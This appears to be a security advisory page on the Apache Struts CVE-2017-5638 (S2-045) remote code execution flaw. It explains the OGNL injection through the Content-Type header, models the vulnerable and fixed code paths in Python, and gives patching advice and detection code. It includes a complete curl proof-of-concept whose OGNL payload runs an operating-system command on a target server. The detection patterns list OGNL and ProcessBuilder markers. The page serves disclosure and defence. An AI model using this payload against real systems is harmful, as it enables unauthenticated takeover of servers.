Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

CVE-2017-5638 (Apache advisory S2-045) is a flaw in the error handling of the Jakarta Multipart parser in Apache Struts 2. Struts hands a request to that parser whenever its Content-Type header contains the string `multipart/form-data`, so the request does not need to carry a real file upload. If the header is not a valid multipart media type, the parser throws an exception whose message embeds the raw header value, and Struts then builds an error message from it through its localized-text lookup, which evaluates `%{...}` and `${...}` Object-Graph Navigation Language (OGNL) expressions before any validation of the header has taken place. OGNL can call arbitrary Java methods and manipulate the application's runtime environment. An attacker therefore embeds an OGNL expression in the Content-Type header and the server evaluates it with the permissions of the running Struts application, which typically means full system compromise. No authentication is needed: a single HTTP POST request with the crafted header is enough to run any operating-system command on the vulnerable server.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07

Prediction: 2017-03-10

What Undercode Says:

```bash
# S2-045 PoC: the OGNL expression in the Content-Type header runs "id" and
# streams the command output into the HTTP response body.
curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://target.com/struts2-showcase/fileupload/doUpload.action
```

How the Exploit Works:

Inject a Content-Type header that contains `multipart/form-data` (so Struts routes the request to the Jakarta parser) together with an OGNL expression.

The parser fails on the malformed header and embeds it in its exception message; Struts passes that message through its localized-text lookup, which evaluates the OGNL inside it.

The expression disables OGNL's member-access restrictions, spawns a process with `java.lang.ProcessBuilder`, and copies its output into the HTTP response.
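The description at the top and the three steps above, modelled in Python as an added example (not code from this page, from Undercode or from Apache Struts): stand-ins for the dispatcher's routing check, for the Jakarta parser's failure message, and for the framework's expression interpolation, with a vulnerable handler beside a hardened one. Python's `eval()` plays the part of the OGNL interpreter, so the constructed malicious header carries a Python expression where the real payload carries OGNL; the function names and the `struts.messages.upload.error` template are illustrative, not Struts identifiers.

```python
"""Model of the CVE-2017-5638 error-handling path (constructed for this article, not Struts code).

Struts hands a request to the Jakarta multipart parser when the Content-Type
header contains "multipart/form-data".  If parsing fails, the vulnerable
parser built an error message that embedded the raw header value, and that
message went through the framework's localized-text lookup, which evaluates
%{...} and ${...} expressions as OGNL.  A tiny evaluator stands in for OGNL
below, so the injected expression uses Python syntax.
"""
import re

EXPRESSION = re.compile(r"[%$]\{(.*?)\}", re.DOTALL)


def interpolate(text):
    """Stand-in for OGNL interpolation of a message: every %{...} or ${...}
    block is evaluated and replaced by its result.  Python's eval() plays the
    role of the OGNL interpreter (in Struts the expression reaches ProcessBuilder)."""
    return EXPRESSION.sub(lambda m: str(eval(m.group(1), {"__builtins__": {}}, {})), text)


def jakarta_parse(content_type):
    """Stand-in for the multipart parser: accepts only a real multipart media
    type with a boundary parameter; otherwise raises with the header echoed in
    the message, which is what commons-fileupload does."""
    media, _, params = content_type.partition(";")
    if media.strip().lower() not in ("multipart/form-data", "multipart/mixed") or "boundary=" not in params:
        raise ValueError(
            "the request doesn't contain a multipart/form-data or multipart/mixed "
            "stream, content type header is " + content_type)
    return "parsed"


def vulnerable_handle(content_type):
    """Pre-fix shape: the exception text (header included) becomes the default
    message and is interpolated, so attacker expressions are evaluated."""
    if "multipart/form-data" not in content_type:   # dispatcher's substring routing test
        return "not multipart; parser not invoked"
    try:
        return jakarta_parse(content_type)
    except ValueError as e:
        default_message = f"{type(e).__name__}: {e}"
        return interpolate(default_message)          # the bug: untrusted text is interpolated


def hardened_handle(content_type):
    """Fixed shape: only a fixed template is interpolated; the untrusted header
    text is substituted afterwards as plain data and never evaluated."""
    if "multipart/form-data" not in content_type:
        return "not multipart; parser not invoked"
    try:
        return jakarta_parse(content_type)
    except ValueError as e:
        template = interpolate("struts.messages.upload.error: {0}")   # illustrative key
        return template.format(str(e))


# Constructed inputs.  The malicious one keeps the substring the dispatcher looks
# for and carries a Python expression where the real payload carries OGNL.
BENIGN = "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"
MALICIOUS = "%{'multipart/form-data' and 7 * 191}"

if __name__ == "__main__":
    for ct in (BENIGN, "application/json", MALICIOUS):
        print("vulnerable:", vulnerable_handle(ct))
        print("hardened:  ", hardened_handle(ct))
```

Only the vulnerable handler turns the crafted header into `1337`; the hardened one interpolates a fixed template first and substitutes the exception text afterwards as data, which is the shape of the fix: untrusted text must never reach the expression evaluator, whatever the expression language.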

Protection from this CVE

Apply the vendor patch immediately.

Upgrade to Struts 2.3.32 or 2.5.10.1, the first releases that fix the multipart error-handling path.

Filter the Content-Type header at the edge until the upgrade lands: the Apache advisory's own workaround is a servlet filter that rejects any request whose Content-Type is not a well-formed multipart/form-data value.

Use a Web Application Firewall (WAF) rule for the same check as a stopgap, not as a substitute for patching.
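Two defensive checks for the items above, written for this page as an added example (not Apache's or Undercode's code): a version triage against the affected ranges listed on the page, and a screen for the crafted Content-Type header, first as the per-request filter and then over access-log lines. The log format assumes a custom Apache `LogFormat` whose last quoted field is `%{Content-Type}i`; the log lines, IPs and paths are constructed for this example.

```python
"""Defensive checks for CVE-2017-5638 / S2-045 (constructed for this article; not Apache or Undercode code).

1. is_vulnerable_version(): classify a struts2-core version against the affected
   ranges 2.3.5 - 2.3.31 and 2.5 - 2.5.10 (fixed in 2.3.32 and 2.5.10.1).
2. is_suspicious_content_type(): the per-request filter, rejecting a Content-Type
   that is not a well-formed media type or that carries OGNL markers.
3. scan_access_log(): the same screen over log lines.  Assumes a custom LogFormat
   whose last quoted field is the request's Content-Type header (%{Content-Type}i);
   the sample lines are constructed.
"""
import re

# Inclusive affected ranges, padded to three components so "2.5" compares as 2.5.0.
AFFECTED = (((2, 3, 5), (2, 3, 31)), ((2, 5, 0), (2, 5, 10)))

STRUTS_CORE_JAR = re.compile(r"struts2-core-(\d+(?:\.\d+)+)\.jar$")

# RFC 7231 media type: type "/" subtype, optional ";" parameters.  A value that does
# not even parse as a media type (the PoC header starts with "%{") fails here.
MEDIA_TYPE = re.compile(r"^[A-Za-z0-9][\w.+-]*/[A-Za-z0-9][\w.+-]*(?:\s*;.*)?$", re.DOTALL)

# Tokens that have no business in a Content-Type: OGNL expression openers and the
# identifiers the public payload uses.
OGNL_MARKERS = re.compile(r"[%$]\{|#_memberAccess|@ognl\.|@java\.lang\.|ProcessBuilder", re.IGNORECASE)

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ctype>[^"]*)"$'
)


def parse_version(text):
    """'2.5.10.1' -> (2, 5, 10, 1); '2.5' -> (2, 5, 0)."""
    parts = tuple(int(p) for p in text.split("."))
    return parts + (0,) * (3 - len(parts))


def is_vulnerable_version(text):
    """True when the version falls inside an affected range.  (2, 5, 10, 1) sorts
    above (2, 5, 10) under tuple comparison, so the fix release is excluded."""
    version = parse_version(text)
    return any(low <= version <= high for low, high in AFFECTED)


def version_from_jar(path):
    """Pull the version out of a struts2-core jar path, or None for other jars."""
    match = STRUTS_CORE_JAR.search(path)
    return match.group(1) if match else None


def is_suspicious_content_type(value):
    """Per-request filter: reject malformed media types and OGNL markers."""
    return not MEDIA_TYPE.match(value) or bool(OGNL_MARKERS.search(value))


def scan_access_log(text):
    """Return the logged requests whose Content-Type the filter would have rejected."""
    hits = []
    for line in text.splitlines():
        match = LOG_LINE.match(line)
        if not match or match.group("ctype") == "-":   # unparsable line, or no header sent
            continue
        ctype = match.group("ctype")
        if is_suspicious_content_type(ctype):
            hits.append({"ip": match.group("ip"), "path": match.group("path"), "content_type": ctype})
    return hits


# Constructed log lines; the last field is the Content-Type request header.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Mar/2017:10:12:01 +0000] "POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1" 200 512 "multipart/form-data; boundary=----WebKitFormBoundaryA1B2"
10.0.0.6 - - [07/Mar/2017:10:12:07 +0000] "POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1" 200 87 "%{(#_='multipart/form-data').(#cmd='id')}"
10.0.0.7 - - [07/Mar/2017:10:12:09 +0000] "GET /struts2-showcase/ HTTP/1.1" 200 2048 "-"
10.0.0.8 - - [07/Mar/2017:10:12:11 +0000] "POST /api/items HTTP/1.1" 201 30 "application/json"
"""

if __name__ == "__main__":
    for jar in ("WEB-INF/lib/struts2-core-2.3.31.jar", "WEB-INF/lib/struts2-core-2.5.10.1.jar"):
        print(jar, "vulnerable" if is_vulnerable_version(version_from_jar(jar)) else "fixed")
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious request:", hit)
```

The grammar check catches the public payload outright because it is not a media type at all; the marker check is there for the variant that keeps a valid `multipart/form-data` prefix and hides the expression in a parameter. Neither replaces the upgrade, since OGNL has many spellings, but together they give a usable edge rule and a way to look back through logs for attempts.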

Impact:

Complete system compromise.

Unauthenticated remote access.

Data breach and theft.

Service disruption.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
